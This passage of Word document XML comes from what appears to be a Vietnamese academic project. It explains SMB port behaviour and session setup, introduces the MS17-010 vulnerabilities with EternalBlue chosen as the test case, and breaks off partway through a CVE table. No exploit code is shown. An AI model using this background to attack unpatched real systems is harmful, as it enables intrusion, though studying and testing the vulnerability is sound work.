        <w:t>Nếu cổng 445 phản hồi trước (SYN-ACK), Client sẽ hoàn tất bắt tay trên cổng 445 và phát gói RST để hủy kết nối trên cổng 139. Phiên làm việc sau đó diễn ra trực tiếp qua cổng 445.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB73225" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:t>Nếu cổng 445 bị chặn hoặc không phản hồi nhưng cổng 139 phản hồi, kết nối sẽ tự động lùi về vận hành qua cổng 139 (nếu máy trạm chưa vô hiệu hóa NetBIOS) [2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350B9FB1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cơ chế này có ý nghĩa đối với thực nghiệm: phát hiện cổng TCP 445 ở trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cho thấy có dịch vụ đang lắng nghe trên cổng thường được sử dụng cho Direct-hosted SMB; cần thực hiện bước nhận diện dịch vụ hoặc đàm phán SMB để xác nhận. Đồng thời khi thực hiện phòng thủ, nếu chỉ chặn cổng 445 mà bỏ quên cổng 139 (kèm NetBIOS) thì bề mặt phơi nhiễm SMB vẫn chưa được xử lý đầy đủ [2], [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FA1282" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.1.5. Quy trình trao đổi bản tin cơ bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A4CA76" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Quá trình giao tiếp giữa SMB Client và SMB Server tuân thủ trình tự thiết lập phiên ba giai đoạn trước khi có thể thao tác với dữ liệu hoặc thực thi lệnh [2], [3], [4]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F7E46A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Giai đoạn 1: Thỏa thuận giao thức (Negotiate Protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E027E4B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ngay sau khi hoàn tất bắt tay 3 bước TCP, Client gửi bản tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Negotiate Request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chứa danh sách các chuỗi định danh phiên bản (Dialect) mà nó hỗ trợ (ví dụ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"NT LM 0.12"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cho SMBv1, hoặc các mã hex cho SMBv2/v3). Server đối chiếu với cấu hình nội tại, chọn ra dialect cao nhất mà hai bên cùng hỗ trợ để phản hồi trong bản tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Negotiate Response</w:t>
      </w:r>
      <w:r>
        <w:t>, kèm theo các thông số an ninh sơ bộ (yêu cầu ký số, khả năng hỗ trợ bảo mật) [2], [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B3B72D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Giai đoạn 2: Thiết lập phiên làm việc (Session Setup):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5986E81A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Client gửi bản tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Session Setup Request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đính kèm thông tin xác thực danh tính (thông qua giao thức NTLM hoặc Kerberos). Trong môi trường kiểm thử hoặc với cấu hình mở, phiên kết nối có thể ở dạng vô danh (Anonymous / Null Session). Server kiểm tra thông tin, xác thực danh tính và phản hồi bản tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Session Setup Response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kèm theo mã định danh phiên: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>UID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (đối với SMBv1) hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Session ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (đối với SMBv2/v3) [3], [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27831479" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Giai đoạn 3: Gắn kết tài nguyên (Tree Connect):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB5366E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau khi có UID hoặc Session ID hợp lệ, Client gửi bản tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tree Connect Request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chỉ định đường dẫn tài nguyên chia sẻ qua định dạng UNC, ví dụ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\\Server\ShareName</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hoặc kết nối vào đường ống chia sẻ liên tiến trình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\\Server\IPC$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Inter-Process Communication). Server kiểm tra danh sách quyền truy cập (ACL); nếu hợp lệ, Server phản hồi bản tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tree Connect Response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và cấp phát một mã định danh liên kết: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (đối với SMBv1) hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tree ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (đối với SMBv2/v3) [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5F6F2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Từ thời điểm này, mọi thao tác đọc, ghi tệp hoặc giao tiếp RPC qua Named Pipes đều phải đính kèm đồng thời cặp định danh phiên và định danh kết nối tương ứng (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UID/TID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trong SMBv1, hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Session ID/Tree ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trong SMBv2/v3).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="0E6FB13E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2B0F8BB7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Client                                                              Server</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │                                                                   │</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │─── 1. Bắt tay 3 bước TCP (SYN -&gt; SYN-ACK -&gt; ACK) ────────────────&gt;│ (Port 445/139)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │                                                                   │</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │─── 2. Negotiate Protocol Request (Danh sách Dialects) ───────────&gt;│</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │&lt;──    Negotiate Protocol Response (Dialect được chọn + Security) ─│</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │                                                                   │</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │─── 3. Session Setup Request (Xác thực NTLM / Null Session) ──────&gt;│</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │&lt;──    Session Setup Response (Cấp phát UID [v1] / Session ID) ────│</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │                                                                   │</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │─── 4. Tree Connect Request (Đường dẫn tài nguyên: \\Server\IPC$) ─&gt;│</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │&lt;──    Tree Connect Response (Cấp phát TID [v1] / Tree ID) ────────│</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │                                                                   │</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │─── 5. Thao tác dữ liệu / Gọi lệnh RPC qua Named Pipes ───────────&gt;│</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  │&lt;──    Kết quả phản hồi từ Server ─────────────────────────────────│</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DEF4F1E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="10BB2990" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sơ đồ 1.2: Trình tự trao đổi bản tin cơ bản trong giao tiếp SMB giữa Client và Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77362FEF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.2. Lỗ hổng bảo mật MS17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D9CD9F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.2.1. Tổng quan về bản tin an ninh MS17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B238E2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vào tháng 03 năm 2017, Microsoft phát hành bản tin an ninh định kỳ mang mã hiệu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MS17-010</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nhằm khắc phục các lỗ hổng nghiêm trọng trong việc xử lý gói tin của dịch vụ SMBv1 trên hệ điều hành Windows [5]. Nhóm lỗ hổng này ảnh hưởng tới hầu hết các phiên bản Windows lưu hành tại thời điểm đó, bao gồm Windows Vista, Windows 7, Windows 8.1, Windows 10, cùng các dòng máy chủ Windows Server 2008, 2012 và 2016. Do tính chất nghiêm trọng, Microsoft sau đó đã phát hành thêm bản vá cho các hệ điều hành đã dừng hỗ trợ như Windows XP và Windows Server 2003 [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3D1422" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Các lỗ hổng thực thi mã từ xa trong bản tin MS17-010 cho phép kẻ tấn công gửi các bản tin SMBv1 được chế tạo đặc biệt tới máy chủ mục tiêu. Trong nhiều trường hợp, việc khai thác có thể được thực hiện từ xa mà không cần thông tin xác thực hợp lệ [5]. Trong phạm vi đề tài, CVE-2017-0144 / EternalBlue được lựa chọn làm trường hợp kiểm thử chính.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443A5AFB" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.2. Phân loại các mã CVE và danh mục bản vá theo hệ điều hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC127FA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bản tin an ninh MS17-010 xử lý một nhóm gồm 6 mã định danh lỗ hổng phổ biến (CVE) cùng tồn tại trong driver xử lý SMBv1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [5]. Các công cụ khai thác do nhóm The Shadow Brokers công bố vào tháng 4/2017 đã tận dụng các khiếm khuyết kỹ thuật này để vượt qua cơ chế bảo vệ của Windows [5]. Để trình bày rõ ràng, nội dung được phân tách thành hai bảng: Bảng 1.2 mô tả đặc tính kỹ thuật từng CVE và Bảng 1.3 liệt kê danh mục mã bản vá KB chính thức theo từng phiên bản hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46275EA9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 1.2: Phân loại các mã CVE trong bản tin an ninh Microsoft MS17-010 [5], [10], [11], [12].</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1757"/>
        <w:gridCol w:w="1757"/>
        <w:gridCol w:w="1757"/>
        <w:gridCol w:w="1757"/>
        <w:gridCol w:w="1757"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w:rsidRPr="009A434D" w14:paraId="6974FA45" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="6F67661D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mã CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="6CC555E0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Liên hệ exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="697C6F94" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Phân loại theo nguồn chính thức</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="65D16EAF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tác động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="2E901B53" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">Vai </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>trò</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>trong</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>đồ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>án</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="614B19B9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47B20EF8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CVE-2017-0143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="14F51B22" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
